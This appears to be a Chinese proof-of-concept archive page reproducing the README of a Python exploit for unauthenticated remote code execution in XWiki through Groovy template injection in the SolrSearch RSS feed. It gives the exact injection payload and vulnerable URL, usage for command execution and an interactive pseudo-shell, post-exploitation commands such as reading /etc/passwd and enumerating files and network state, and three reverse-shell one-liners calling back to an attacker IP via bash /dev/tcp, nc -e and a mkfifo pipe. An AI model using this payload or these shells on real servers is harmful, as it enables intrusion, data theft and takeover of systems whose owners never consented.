关联漏洞
描述
Unauthenticated Remote Code Execution in XWiki via SolrSearch Macro
介绍
# XWiki SSTI Exploit
A Python exploit for XWiki Server-Side Template Injection (SSTI) vulnerability via Groovy template injection in the SolrSearch endpoint.
## Vulnerability
- **Type**: Server-Side Template Injection (SSTI)
- **Component**: XWiki SolrSearch RSS feed
- **Impact**: Remote Code Execution
- **Affected Version**: XWiki 15.10.8 (and potentially others)
## Requirements
```bash
pip3 install requests beautifulsoup4
```
## Usage
### Test for Vulnerability
```bash
./xwiki_exploit.py -u http://target --test
```
### Execute Single Command
```bash
./xwiki_exploit.py -u http://target.com -c "whoami"
./xwiki_exploit.py -u http://target.com -c "id"
./xwiki_exploit.py -u http://target.com -c "ls -la /tmp"
```
### Interactive Shell
```bash
./xwiki_exploit.py -u http://target.com
```
This will give you an interactive pseudo-shell where you can run commands:
```
xwiki> whoami
xwiki
xwiki> pwd
/usr/lib/xwiki-jetty
xwiki> ls /home
oliver
xwiki> exit
```
### Debug Mode
```bash
./xwiki_exploit.py -u http://target.com -c "id" --debug
```
### Command-Line Options
- `-u, --url URL`: Target URL (required)
- `-c, --command CMD`: Execute single command
- `--test`: Test if target is vulnerable
- `--no-verify-ssl`: Disable SSL certificate verification
- `--debug`: Enable debug output
## Examples
**Information Gathering:**
```bash
./xwiki_exploit.py -u http://target.com -c "uname -a"
./xwiki_exploit.py -u http://target.com -c "cat /etc/os-release"
./xwiki_exploit.py -u http://target.com -c "cat /etc/passwd"
```
**Find Interesting Files:**
```bash
./xwiki_exploit.py -u http://target.com -c "find /home -type f -readable 2>/dev/null"
./xwiki_exploit.py -u http://target.com -c "ls -la /var/lib/xwiki"
```
**Network Information:**
```bash
./xwiki_exploit.py -u http://target.com -c "ip addr"
./xwiki_exploit.py -u http://target.com -c "netstat -tulpn"
```
**Establish Reverse Shell:**
```bash
# On attacker machine, start listener:
nc -lvnp 1337
# From exploit (try different methods):
./xwiki_exploit.py -u http://target.com -c "bash -c 'bash -i >& /dev/tcp/IP/1337 0>&1'"
./xwiki_exploit.py -u http://target.com -c "nc -e /bin/sh IP 1337"
./xwiki_exploit.py -u http://target.com -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 1337 >/tmp/f"
```
## Technical Details
### Payload Structure
The exploit uses the following SSTI payload structure:
```
}}}{{async async=false}}{{groovy}}println("COMMAND".execute().text){{/groovy}}{{/async}}
```
### Exploitation Flow
1. The payload is URL-encoded and sent to the vulnerable endpoint:
```
/xwiki/bin/view/Main/SolrSearch?media=rss&text=[PAYLOAD]
```
2. The server processes the Groovy template and executes the command
3. The output is captured from the RSS feed response in the format:
```
search on [}}OUTPUT]
```
4. The exploit parses the HTML response to extract the command output
## Notes
- Commands are executed as the `xwiki` user (uid=997)
- Working directory is `/usr/lib/xwiki-jetty`
- Some commands may not produce output if they fail or run in the background
- For complex commands, consider using shell scripts or base64 encoding
## Disclaimer
This tool is for educational and authorized penetration testing purposes only. Only use it on systems you have permission to test.
文件快照
[4.0K] /data/pocs/bbb5cd99cd36d864cfcf5492c8f61547db1fc06e
├── [3.2K] README.md
└── [7.3K] xwiki_exploit.py
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。